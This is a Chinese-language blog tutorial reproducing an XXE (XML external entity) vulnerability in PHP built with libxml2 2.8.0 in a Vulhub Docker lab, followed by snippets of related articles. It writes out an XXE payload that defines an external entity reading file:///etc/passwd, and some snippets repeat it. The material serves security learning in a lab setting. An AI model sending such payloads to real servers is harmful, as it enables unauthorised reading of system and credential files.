PHP环境 XML外部实体注入漏洞

最新推荐文章于 2024-06-07 18:14:19 发布

原创最新推荐文章于 2024-06-07 18:14:19 发布 · 377 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#php #xml #开发语言

本文详细介绍了libxml2.9.0之后的XXE漏洞消亡情况，通过复现过程演示如何在旧版本libxml2（如2.8.0）下利用PHP实现XXE攻击，并展示了如何构造payload获取passwd文件内容。

漏洞描述

libxml2.9.0以后，默认不解析外部实体，导致XXE漏洞逐渐消亡。为了演示PHP环境下的XXE漏洞，本例会将libxml2.8.0版本编译进PHP中。PHP版本并不影响XXE利用。

影响范围

libxml2.8.0版本

复现过程

使用vulhub

cd /vulhub/php/php_xxe 进入目录

docker-compose up -d 启动

访问

抓包，刷新一下页面就行

发送到repeater

进行修改

在最后增加上这个代码

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE xxe [

<!ELEMENT name ANY >

<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>

<root>

</root>

这样就获取到passwd的值了

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

冰雪

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

PHP环境 XML外部实体注入漏洞（XXE）

m0_46580995的博客

07-19

909

PHP环境 XML外部实体注入漏洞（XXE）简介： PHP 7.0.30 libxml 2.8.0 复现环境vulhub exec进入docker 有三个文件 dom.php 使用DOMDocument解析body SimpleXMLElement.php 使用SimpleXMLElement类解析body simplexml_load_string.php 使用simplexml_load_string函数解析body 相应代码如下 root@e1ccaae36891:/var/www/html#

[Vulhub] PHP环境 XML外部实体注入漏洞（XXE）

weixin_45605352的博客

05-07

4680

0x01 预备知识 XXE是什么？ XXE(XML External Entity Injection)也就是XML外部实体注入，XXE漏洞发生在应用程序解析XML输入时，XML文件的解析依赖libxml 库，而 libxml2.9 以前的版本默认支持并开启了对外部实体的引用，服务端解析用户提交的XML文件时，未对XML文件引用的外部实体（含外部一般实体和外部参数实体）做合适的处理，并且实体的URL支持 file:// 和 ftp:// 等协议，导致可加载恶意外部文件和代码，造成任意文件读取、命令执行、

参与评论您还未登录，请先登录后发表或查看评论

PHP XXE漏洞

weixin_30849591的博客

01-24

1185

PHP xml 外部实体注入漏洞（XXE） 1.环境 PHP 7.0.30Libxml 2.8.0Libxml2.9.0 以后，默认不解析外部实体，对于PHP版本不影响XXE的利用 2.原理介绍 XML 被设计为传输和存储数据,其焦点是数据的内容。 HTML 被设计用来显示数据,其焦点是数据的外观。 HTML 旨在显示信息,而 XML 旨在传输信息。XML特点，XML 被设计用来结构化、...

vulhub漏洞—php环境XML外部实体注入漏洞（XXE）

weixin_45808483的博客

12-17

1161

PHP环境 XML外部实体注入漏洞（XXE） XXE知识总结环境介绍： PHP 7.0.30 libxml 2.8.0 libxml2.9.0以后，默认不解析外部实体，导致XXE漏洞逐渐消亡。为了演示PHP环境下的XXE漏洞，本例会将libxml2.8.0版本编译进PHP中。PHP版本并不影响XXE利用。 vulhub搭建漏洞： github位置：https://github.com/vulhub/vulhub/tree/master/php/php_xxe 使用如下命令编译

（vulhub）PHP环境XML外部实体注入漏洞（XXE）

Gjqhs的博客

03-08

1161

Vulhub 靶场安装_Gjqhs的博客-优快云博客查询对应镜像打开docker systemctl start docker 设置docker自启动 systemctl enable docker 查看docker状态 systemctl status docker 查找xxe镜像 docker search php_xxe 拉取镜像，（有可能超时，如下）启动xxe服务访问即可见此页面，可看到其版本为2.8.0。 http:...

XML外部实体注入漏洞——XXE简单分析

未完成的歌~的博客

02-01

3401

前言：前几天做了南邮 NJUPT CTF的几道题，感觉自己要学的的东西还有太多！今天借着比赛中的一道Web题来系统的学习下XML外部实体注入(XML External Entity Injection) 题目：Fake XML cookbook 题目：Fake XML cookbook 平台暂时还未关闭，想要复现的抓紧了！网址：https://nctf.x1c.club/challenges#Web ...

PHP环境 XML外部实体注入漏洞 XXE 漏洞复现

ADummy的博客

02-26

551

PHP环境 XML外部实体注入漏洞（XXE） by ADummy 0x00利用路线构造XXE payload—>POST发送—>有回显（也有blind xxe 参考资料） 0x01漏洞介绍 PHP环境 XML外部实体注入漏洞（XXE） 0x02漏洞复现 payload <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xx

漏洞英文bug/PHP环境XML外部实体注入漏洞(XXE)_零开始信息安全知识点

程序员六七的博客

06-07

511

1、XML介绍XML叫做可扩展标记语言，类似于HTML，但是他们之间又有着明显的差别；HTML的主要作用是用来显示数据的，而XML的主要作用是传输和存储数据的。

PHP 环境 XML 外部实体注入漏洞从环境搭建到实操(全网最详细最齐全)

qq_64652650的博客

10-17

459

XML 外部实体注入漏洞从环境搭建到实操

PHPYun XML 注入漏洞

whatiwhere的博客

12-06

1925

实验环境实验环境操作机系统：WindowsXP 目标网站：www.test.ichunqiu 实验目的掌握本次漏洞的原理及其利用方法学会如何修复Sql注入漏洞实验工具 Hack Bar ：它是火狐浏览器的一款插件，包含一些常用的工具。(SQL injection,XSS,加密等)，web开发人员可以利用它，快速构建一个http请求，或者用它快速实现某种算法等，本次实验主要用到它的...

4、PHP的xml注入漏洞（xxe）

weixin_51520483的博客

05-21

904

2、CTRL+f搜索xml，发现2.8.0版本，含有xml漏洞。5、在触发bug的包下面加上，获取flag。1、打开网页是一个PHP版本页面。青少年ctf：PHP的XXE。4、使用代码出发bug。

PHP xml实体注入

javaEE_zero的博客

01-05

1292

php xml实体注入，php xxe漏洞

XML注入

秋水的博客

09-08

4140

XML注入简介什么是xml？ XML 指可扩展标记语言（EXtensible Markup Language） XML 是一种标记语言，很类似 HTML XML 的设计宗旨是传输数据，而非显示数据 XML 标签没有被预定义。您需要自行定义标签。 XML 被设计为具有自我描述性。 XML 是 W3C 的推荐标准例如：在tomcat中配置文件的存储格式便是XML文件，server...

php 获取xml内容,PHP: XML 外部实体例程 - Manual

weixin_34099891的博客

03-09

162

$file="xmltest.xml";functiontrustedFile($file){//仅信任本地文件if(!preg_match("@^([a-z]+)\:\/\/@i",$file)&&fileowner($file)==getmyuid()){returntrue;}returnfalse;}functionstartElement($parser,$nam...

php无法加载外部实体,php – 加载Symfony 2应用程序时,“无法加载外部实体”进行故障排除...

weixin_42510140的博客

03-28

246

我正在尝试用symfony 2开始一个新项目,但我遇到了一些问题.当我要去/web/app_dev.php我有这个错误：InvalidArgumentException: [WARNING 1549] failed to load external entity"file://///INFO/WWW/perso/2011-2012/gdesbiey/Musique/vendor/symfony/s...

php 防注入正则,PHP正则表达式漏洞下注

weixin_34917128的博客

03-09

265

没有一个步骤或完全直接的方式来利用你的代码,但这里有一些想法.你在这个例子中传递给copy(),但是你已经提到你已经使用这个方法验证文件ext了一段时间,所以我假设你有其他情况可能已经使用这个过程与其他功能在不同的PHP版本.将其视为测试程序(Exploiting include,require)：$name = "test.PHP#.txt";if (preg_match('/\.(xml|cs...

29. XXE漏洞即XML外部实体攻击漏洞，在解析不可信XML时，可以使用开发语言提供的禁止解析DTDs防止XXE漏洞攻击正确错误